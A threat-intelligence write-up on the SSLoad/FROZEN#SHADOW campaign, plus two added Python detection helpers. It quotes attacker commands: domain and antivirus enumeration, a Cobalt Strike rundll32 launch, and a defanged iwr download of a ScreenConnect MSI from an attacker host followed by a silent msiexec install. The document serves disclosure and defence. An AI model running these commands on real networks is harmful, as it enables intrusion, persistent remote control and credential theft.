SSLoad Malware Combined with Tools Hijacks Entire Network Domain



The FROZEN#SHADOW attack campaign employs SSLoad malware alongside Cobalt Strike Implants to seize control of the entire network. Additionally, threat actors utilize Remote Monitoring and Management (RMM) software like ScreenConnect for enhanced control.

SSLoad Malware

SSLoad is a sophisticated malware adept at silently breaching systems, extracting sensitive data, and transmitting it to malicious operators. Additionally, it employs various backdoors and payloads to elude detection and sustain persistence.

The new attack campaign begins with a conventional phishing email containing a malicious link. Upon clicking, users are redirected to the mmtixmm[.]org URL, leading to another download site where a JavaScript file is downloaded to the victim’s machine.


If manually executed, the JavaScript file initiates several operations, downloading and executing additional payloads on the victim’s machine.

The phishing email campaigns appear to target victims indiscriminately across multiple countries in Asia, Europe, and the Americas.


Further analysis of the malware uncovered a multi-stage attack process:

Stage 1: Initial Execution – JavaScript

Stage 2: Execution of MSI File

Stage 3: Malware Execution

Stage 4: Cobalt Strike Execution

Stage 5: Utilization of RMM Software & Lateral Movement

Stage 1: Initial Execution – JavaScript

In the initial stage, the JavaScript file is manually executed.

Upon analysis of the JS file out_czlrh.js, it was found that 97.6% of the file consists of comments filled with random characters, which obscure the actual code.

However, removing the commented code unveiled clear JS code devoid of obfuscation.

Analyzing the JS code revealed it begins by creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject. Subsequently, the code attempts to access the WMI object for basic command line operations with GetObject("winmgmts:\\.\root\cimv2").


Additionally, the code establishes variables to manage connection attempts and gather the connection status of a network share.

Moreover, it maps all available drives to a network share located at \\wireoneinternet[.]info@80\share.

The script then executes the "net use" command via WMI to correctly map the network drive.

After a three-second delay, it repeats the command to confirm the mapping.

Upon successful completion of these steps, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.
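The 97.6% comment-padding figure reported for out_czlrh.js can be reproduced for any suspicious script with a small triage helper. This is an added example, not code from the article or the campaign; the sample script it runs on is constructed to mimic the dropper's shape (a few real lines buried in random-character comments), and the 0.9 threshold is an assumption.

```python
import random
import string

def strip_js_comments(src: str) -> str:
    """Remove // and /* */ comments, copying string literals verbatim so a
    '//' inside "http://..." survives. Regex literals are not tracked (a '//'
    inside /.../ would be misread), which is acceptable for triage."""
    out, i, n = [], 0, len(src)
    while i < n:
        c = src[i]
        if c in ('"', "'", '`'):                       # string literal: copy through closing quote
            out.append(c); i += 1
            while i < n and src[i] != c:
                if src[i] == '\\' and i + 1 < n:       # keep escaped characters, e.g. \"
                    out.append(src[i]); i += 1
                out.append(src[i]); i += 1
            if i < n:
                out.append(src[i]); i += 1
        elif src.startswith('//', i):                  # line comment: drop to end of line
            j = src.find('\n', i)
            i = n if j < 0 else j
        elif src.startswith('/*', i):                  # block comment: drop to closing */
            j = src.find('*/', i + 2)
            i = n if j < 0 else j + 2
        else:
            out.append(c); i += 1
    return ''.join(out)

def comment_ratio(src: str) -> float:
    """Fraction of the file that disappears once comments are stripped."""
    return 0.0 if not src else 1 - len(strip_js_comments(src)) / len(src)

def is_comment_padded(src: str, threshold: float = 0.9) -> bool:
    """Flag scripts whose bulk is comment padding, as with out_czlrh.js (97.6%)."""
    return comment_ratio(src) >= threshold

# Constructed sample (not the real dropper): a few genuine lines buried in junk comments.
_rnd = random.Random(1)
def _junk(k): return ''.join(_rnd.choice(string.ascii_letters + string.digits) for _ in range(k))
SAMPLE_JS = '\n'.join([
    '// ' + _junk(600),
    'var net = new ActiveXObject("WScript.Network"); // ' + _junk(600),
    '/* ' + _junk(600) + ' */',
    'var fso = new ActiveXObject("Scripting.FileSystemObject");',
    'var wmi = GetObject("winmgmts:\\\\.\\root\\cimv2"); // ' + _junk(600),
])
```

Running `comment_ratio(SAMPLE_JS)` on the constructed sample gives a value above 0.9, and `strip_js_comments(SAMPLE_JS)` leaves only the three live statements.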

Stage 2: MSI Execution

The slack.msi file resembles the BazarBackdoor, commonly associated with the TrickBot malware group.

Upon execution, the malware communicates with several domains:

  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • Maramaravilha[.]com
  • globalsolutionunlimitedltd[.]com


Only after this communication does the SSLoad malware get downloaded and executed.

SSLoad’s payloads include a DLL file with a semi-random name, typically found in %APPDATA%\local\digistamp\mbae-api-na.dll.

This DLL is then executed by Rundll32.exe, after which it copies itself to %APPDATA%\Custom_update.

Stage 3: Malware Execution

During the rundll32.exe execution, communication is initiated with two preconfigured C2 servers: hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/. Subsequently, the malware begins collecting system and user data for the local host and domain using cmd.exe commands:

  • cmd.exe /c ipconfig /all
  • cmd.exe /c systeminfo
  • cmd.exe /c nltest /domain_trusts
  • cmd.exe /c nltest /domain_trusts /all_trusts
  • cmd.exe /c net view /all /domain
  • cmd.exe /c net view /all
  • cmd.exe /c net group "domain admins" /domain
  • cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • cmd.exe /c net config workstation
  • cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
  • cmd.exe /c whoami /groups


The gathered information is transmitted to the C2 servers via HTTPS connections. Upon receiving this data from the infected system, threat actors verify its legitimacy before executing manual commands. These commands include:

  • powershell.exe -c "[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding('utf-8'); cd c:\; powershell"
  • whoami.exe /groups
  • net.exe group "domain admins" /dom
  • wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list

These commands are used to manipulate and explore the server environment for the subsequent stages of malware activities.
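The discovery commands listed above all run as cmd.exe children of the rundll32.exe process hosting SSLoad, inside a short time span, which makes the burst itself a detectable pattern. The following is an added example (not from the article): it scans constructed Sysmon-style process-creation events and alerts when one rundll32.exe parent covers three or more of the listed discovery categories within two minutes. The category names, the window and the threshold are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

DISCOVERY_PATTERNS = {  # shapes from the command list above; category names are my own
    "domain_trusts": re.compile(r"\bnltest\b.*/domain_trusts", re.I),
    "domain_admins": re.compile(r'\bnet(\.exe)?\s+group\s+"?domain admins"?', re.I),
    "av_enum": re.compile(r"securitycenter2.*antivirusproduct", re.I),
}

def classify(cmdline: str) -> set:
    # categories the command line matches (empty set if none)
    return {name for name, pat in DISCOVERY_PATTERNS.items() if pat.search(cmdline)}

def find_discovery_bursts(events, window=timedelta(minutes=2), min_distinct=3):
    """Alert when one rundll32.exe parent spawns cmd.exe children covering >= min_distinct categories in `window`."""
    groups = defaultdict(list)
    for ev in events:
        parent, image = ev["parent_image"].lower(), ev["image"].lower()
        if not (parent.endswith("rundll32.exe") and image.endswith("cmd.exe")):
            continue                                   # SSLoad runs its discovery from rundll32
        if tags := classify(ev["cmdline"]):
            groups[(ev["host"], ev["parent_pid"])].append((ev["time"], tags))
    alerts = []
    for (host, ppid), hits in groups.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _) in enumerate(hits):             # slide the window over sorted hits
            seen = set()
            for t, tags in hits[i:]:
                if t - t0 > window: break
                seen |= tags
            if len(seen) >= min_distinct:
                alerts.append({"host": host, "parent_pid": ppid, "categories": sorted(seen)})
                break                                  # one alert per parent process
    return alerts

# Constructed Sysmon-style events, not real telemetry: WS01 shows the SSLoad burst.
T0 = datetime(2024, 4, 1, 10, 0, 0)
RUNDLL, EXPLORER = r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe"
def _ev(host, secs, parent, ppid, cmd):
    return {"host": host, "time": T0 + timedelta(seconds=secs), "parent_image": parent,
            "parent_pid": ppid, "image": r"C:\Windows\System32\cmd.exe", "cmdline": cmd}
SAMPLE_EVENTS = [
    _ev("WS01", 0, RUNDLL, 4120, "cmd.exe /c ipconfig /all"),
    _ev("WS01", 5, RUNDLL, 4120, "cmd.exe /c nltest /domain_trusts /all_trusts"),
    _ev("WS01", 9, RUNDLL, 4120, 'cmd.exe /c net group "domain admins" /domain'),
    _ev("WS01", 20, RUNDLL, 4120, r"cmd.exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list"),
    _ev("WS02", 0, EXPLORER, 900, 'cmd.exe /c net group "domain admins" /domain'),  # admin at a console
]
```

The WS02 event matches a pattern but is ignored because its parent is explorer.exe, which keeps routine administrator activity out of the alert.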

Stage 4: Cobalt Strike Beacon

This stage of the malware involves deploying the Cobalt Strike beacon on systems after executing manual commands.

Once deployed, this beacon becomes the primary C2 communication channel. It is dropped and executed via the following rundll32.exe command:

Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

Additionally, threat actors utilized Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using these commands:

  • cmd.exe /c whoami /groups
  • cmd.exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • cmd.exe /c iwr -uri "hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=" -outfile c:\programdata\msedgeview.msi
  • cmd.exe /c systeminfo
  • cmd.exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn

Stage 5: RMM Software And Lateral Movement


Every compromised system is managed using the ScreenConnect RMM Software to maintain complete control.

Following this, lateral movement occurs by harvesting credentials and critical system details.

Environment enumeration is conducted using PowerShell commands like Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer.

Credential extraction is performed, potentially allowing access to a domain admin account NTLM hash.

Indicators Of Compromise


About the Author:

FirstHackersNews- Identifies Security
